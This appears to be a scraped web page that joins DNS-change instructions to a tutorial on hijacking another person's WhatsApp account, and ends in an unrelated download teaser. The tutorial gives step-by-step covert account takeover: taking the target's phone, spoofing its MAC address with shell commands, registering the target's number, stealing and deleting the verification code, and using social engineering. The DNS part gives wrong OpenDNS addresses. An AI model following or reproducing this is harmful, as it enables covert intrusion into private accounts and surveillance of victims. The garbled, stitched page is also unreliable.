Right-click the Internet connection (MTNL, Airtel, BSNL, etc.) on which you’re having trouble accessing websites, and click Properties.

Select Internet Protocol Version 4 (TCP/IP), and then click Properties.

Click the radio button next to Use the following DNS Server address.
If you want to use Google DNS, enter 8.8.8.8 as the Preferred DNS Server and 8.8.4.4 as the Alternate DNS Server.
If you want to use OpenDNS, use 202.67.220.220 and 202.67.222.222 respectively. After entering these, click OK

For Apple Users

¶Open Settings > tap Wi-Fi > tap the Wi-Fi network the device is connected to.
¶Tap DNS and change the two values to Google DNS or Open DNS (explained in step 5 above). These two values should be separated by a comma and one space (8.8.8.8, 8.8.4.4).

For Android users

¶Open Settings > tap Wi-Fi.
¶Long press the Wi-Fi network you’re connected to > tap Modify Network.
¶Now tap the box next to Show advanced options. Scroll down.
Tap DHCP > select Static IP > scroll down and modify DNS 1 and DNS 2 (as explained in step 5 above).
¶Click the radio button next to Use the following DNS Server address. If you want to use Google DNS, enter 8.8.8.8 as the Preferred DNS Server and 8.8.4.4 as the Alternate DNS Server. If you want to use OpenDNS, use 202.67.220.220 and 202.67.222.222 respectively. After entering thes
e, click OK.


How to hack WhatsApp Account through MAC spoofing attack.


How to hack WhatsApp Account through MAC Spoofing Attack.














First of all the requirements of this procedure are:

1. Mobile Phone Rooted
2. Target's Phone for 5 minutes
3. Busybox and Terminal App installed on your android device
4. Wifi Scanner ( if you can't reach the target's phone for getting his / her mac address through settings )

TUTORIAL

1. Uninstall WhatsApp from your phone or device. You'll install it again at the end of the method, but you'll need to configure it differently, and the easiest way to make sure you'll be able to do that correctly is to completely uninstall it now.

2.
Obtain your target's phone. You'll need it for two different steps throughout the process, but this shouldn't take too long - you should be able to return it before your target starts to miss it.



3. Find your target's phone's Media Access Control (MAC) address. A MAC address is a unique identifier assigned to your phone or other device that essentially serves as its online identity. Find and write down your target's MAC address. It takes the form of six pairs of letters or numbers, separated by colons (01:23:45:67:89:ab).
On an Android, find this in Settings ? About phone ? Status ? Wi-Fi MAC address.
On an iPhone, go to Settings ? General ? About ? Wi-Fi Address.
On a Windows phone, look in Settings ? About ? More info ? MAC address.
On a BlackBerry, go to Options ? Device ? Device and Status info ? WLAN MAC.


4. Find your MAC address using the instructions above. Make sure to save it somewhere secure, as you'll want to change your device back to that address once you're done.


5. Change ("spoof") your phone's MAC address to that of your target. This will allow your phone to pass as your target's, letting you convince WhatsApp that you are your target when you log in.
On an iPhone or other device, install a MAC spoofing app like MacDaddy X or WifiSpoof. Use that to change your MAC address.
On Android, install BusyBox and the Terminal Emulator (apps available for free on Google Play). In the terminal, type "ip link show" to see a list of interfaces. Identify the one that has your MAC address -- for this example, we'll use the eth0 interface. In the terminal emulator, enter "ip link set eth0 address XX:XX:XX:XX:XX:XX" and "ip link set eth0 broadcast XX:XX:XX:XX:XX:XX", where eth0 is the interface you identified and XX:XX:XX:XX:XX:XX is your target's MAC address. To check that you've successfully changed your MAC address, enter "ip link show eth0."



6.
Install and configure WhatsApp on your phone. Enter your target's phone number to set up WhatsApp rather than your own. This will allow you to receive their messages and send messages from their account.


7. Get the confirmation code from your target's phone. This code will be sent to their phone number as part of the WhatsApp configuration process. Access their phone one last time to get that verification code. Enter it into WhatsApp on your phone when prompted, and you're all ready to go.
If you don't want your target to find out about your spoofing, make sure to delete the confirmation code from their phone before they can see it.



8. When you no longer need to access your target's WhatsApp account, change your MAC address back to what it was. Repeat the instructions to change it, but this time change it to your original address rather than your target's. This will restore your phone to how it was originally, which will ensure that there are no future problems with Internet usage or connectivity.




NB: If you can't reach the target's phone to get mac address you can use a WIFI SCANNER. If you can't get the code because you don't have physical access into the victim's phone you can use social engineering and if you want further help send us a PM.

How to use a solderless breadboard.mp4

  Download now  Enjoy! Follow us for more...